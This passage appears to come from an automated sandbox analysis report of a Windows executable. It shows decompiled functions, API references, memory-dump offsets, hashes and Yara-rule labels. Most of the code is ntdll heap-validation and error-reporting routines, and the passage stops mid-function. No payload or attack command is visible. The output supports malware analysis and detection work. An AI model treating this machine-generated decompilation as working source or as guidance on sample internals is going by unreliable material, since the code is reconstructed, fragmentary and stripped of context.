				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F3967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F39694

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf25dbee06da7e320f73ab0f1f7253e3cb566548c8a87fab40a0380862e55867
Instruction ID: 791a3ae88e6777812f7d79c811b89c478ddfaf4e8741f3b49aa31bce46dd32b6
Opcode Fuzzy Hash: cf25dbee06da7e320f73ab0f1f7253e3cb566548c8a87fab40a0380862e55867
Instruction Fuzzy Hash: F2B09B71D064C5C5D711D76046087177D0477D0751F16C061D2020681B47B8C491F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FAB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

write to, xrefs: 00FAB4A6
a NULL pointer, xrefs: 00FAB4E0
*** then kb to get the faulting stack, xrefs: 00FAB51C
The instruction at %p tried to %s , xrefs: 00FAB4B6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00FAB53F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00FAB305
*** enter .exr %p for the exception record, xrefs: 00FAB4F1
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00FAB323
The critical section is owned by thread %p., xrefs: 00FAB3B9
*** enter .cxr %p for the context, xrefs: 00FAB50D
*** Inpage error in %ws:%s, xrefs: 00FAB418
*** A stack buffer overrun occurred in %ws:%s, xrefs: 00FAB2F3
The instruction at %p referenced memory at %p., xrefs: 00FAB432
read from, xrefs: 00FAB4AD, 00FAB4B2
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00FAB314
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FAB38F
<unknown>, xrefs: 00FAB27E, 00FAB2D1, 00FAB350, 00FAB399, 00FAB417, 00FAB48E
Go determine why that thread has not released the critical section., xrefs: 00FAB3C5
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 00FAB39B
*** An Access Violation occurred in %ws:%s, xrefs: 00FAB48F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00FAB484
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FAB3D6
The resource is owned shared by %d threads, xrefs: 00FAB37E
The resource is owned exclusively by thread %p, xrefs: 00FAB374
an invalid address, %p, xrefs: 00FAB4CF
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00FAB2DC
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00FAB47D
*** Resource timeout (%p) in %ws:%s, xrefs: 00FAB352
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00FAB476
This failed because of error %Ix., xrefs: 00FAB446

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 990d00f892db4255b3f279840a3e0fb857ea2c874be5b8bcb5a88869cd2db2ee
Instruction ID: 021f252cbc21c3331ae36e66ce524e2eb3f26fef06a17a1e809c3bc855207251
Opcode Fuzzy Hash: 990d00f892db4255b3f279840a3e0fb857ea2c874be5b8bcb5a88869cd2db2ee
Instruction Fuzzy Hash: C781E2B5A04318FFDB21AE068C46EAF3B26AF4BB61F454044F4052B253D3658851FBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00FB1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xed48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00EFB150();
				} else {
					E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xfe589c);
				E00EFB150("Heap error detected at %p (heap handle %p)\n",  *0xfe58a0);
				_t27 =  *0xfe5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00FB1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00EFB150();
				} else {
					E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00EFB150("Error code: %d - %s\n",  *0xfe5898);
				_t113 =  *0xfe58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00EFB150("Parameter1: %p\n",  *0xfe58a4);
				}
				_t115 =  *0xfe58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00EFB150("Parameter2: %p\n",  *0xfe58a8);
				}
				_t117 =  *0xfe58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00EFB150("Parameter3: %p\n",  *0xfe58ac);
				}
				_t119 =  *0xfe58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xfe58b4);
					E00EFB150("Last known valid blocks: before - %p, after - %p\n",  *0xfe58b0);
				} else {
					_t120 =  *0xfe58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00EFB150();
				} else {
					E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00EFB150("Stack trace available at %p\n", 0xfe58c0);
			}

0x00fb1c10
0x00fb1c16
0x00fb1c1e
0x00fb1c3d
0x00fb1c3e
0x00fb1c20
0x00fb1c35
0x00fb1c3a
0x00fb1c44
0x00fb1c55
0x00fb1c5a
0x00fb1c65
0x00fb1c67
0x00000000
0x00fb1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00fb1c67
0x00fb1cdc
0x00fb1ce5
0x00fb1d04
0x00fb1d05
0x00fb1ce7
0x00fb1cfc
0x00fb1d01
0x00fb1d0b
0x00fb1d17
0x00fb1d1f
0x00fb1d25
0x00fb1d30
0x00fb1d4f
0x00fb1d50
0x00fb1d32
0x00fb1d47
0x00fb1d4c
0x00fb1d61
0x00fb1d67
0x00fb1d68
0x00fb1d6e
0x00fb1d79
0x00fb1d98
0x00fb1d99
0x00fb1d7b
0x00fb1d90
0x00fb1d95
0x00fb1daa
0x00fb1db0
0x00fb1db1
0x00fb1db7
0x00fb1dc2
0x00fb1de1
0x00fb1de2
0x00fb1dc4
0x00fb1dd9
0x00fb1dde
0x00fb1df3
0x00fb1df9
0x00fb1dfa
0x00fb1e00
0x00fb1e0a
0x00fb1e13
0x00fb1e32
0x00fb1e33
0x00fb1e15
0x00fb1e2a
0x00fb1e2f
0x00fb1e39
0x00fb1e4a
0x00fb1e02
0x00fb1e02
0x00fb1e08
0x00000000
0x00000000
0x00fb1e08
0x00fb1e5b
0x00fb1e7a
0x00fb1e7b
0x00fb1e5d
0x00fb1e72
0x00fb1e77
0x00fb1e95

Strings

heap_failure_lfh_bitmap_mismatch, xrefs: 00FB1CD7
heap_failure_virtual_block_corruption, xrefs: 00FB1C91
heap_failure_internal, xrefs: 00FB1C6E
heap_failure_usage_after_free, xrefs: 00FB1CBB
heap_failure_invalid_allocation_type, xrefs: 00FB1CB4
heap_failure_multiple_entries_corruption, xrefs: 00FB1C8A
heap_failure_freelists_corruption, xrefs: 00FB1CC9
heap_failure_buffer_underrun, xrefs: 00FB1C9F
Heap error detected at %p (heap handle %p), xrefs: 00FB1C50
Stack trace available at %p, xrefs: 00FB1E86
Error code: %d - %s, xrefs: 00FB1D12
heap_failure_listentry_corruption, xrefs: 00FB1CD0
heap_failure_buffer_overrun, xrefs: 00FB1C98
heap_failure_invalid_argument, xrefs: 00FB1CAD
heap_failure_unknown, xrefs: 00FB1C75
heap_failure_entry_corruption, xrefs: 00FB1C83
HEAP[%wZ]: , xrefs: 00FB1C30, 00FB1CF7, 00FB1D42, 00FB1D8B, 00FB1DD4, 00FB1E25, 00FB1E6D
Parameter2: %p, xrefs: 00FB1DA5
Last known valid blocks: before - %p, after - %p, xrefs: 00FB1E45
HEAP: , xrefs: 00FB1C16, 00FB1C3D, 00FB1D04, 00FB1D4F, 00FB1D98, 00FB1DE1, 00FB1E32, 00FB1E7A
Parameter1: %p, xrefs: 00FB1D5C
heap_failure_block_not_busy, xrefs: 00FB1CA6
heap_failure_generic, xrefs: 00FB1C7C
heap_failure_cross_heap_operation, xrefs: 00FB1CC2
Parameter3: %p, xrefs: 00FB1DEE

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 871ddeaf79b55d17f34aec86580ce0e36fa1cfb6c50cf48139ce2d339e124f06
Instruction ID: 4aa3b37e755d1399c7f713b6ccbfca7ce5da95b85761939ca6e05860a7a7e119
Opcode Fuzzy Hash: 871ddeaf79b55d17f34aec86580ce0e36fa1cfb6c50cf48139ce2d339e124f06
Instruction Fuzzy Hash: E861C437A5268CDFC3119B86D8A6E7573E4FB04B30B59907AF90D7B352D7249C40AE0A

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4AEF, Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00FB4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00EFB150();
						} else {
							E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00EFB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E00FAFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00EFB150();
						} else {
							E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00EFB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00EFB150();
									} else {
										E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00EFB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E00FAFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00EFB150();
										} else {
											E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E00F4D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E00FBA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E00F1E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E00FBA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E00F1E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E00F1A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E00F1A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
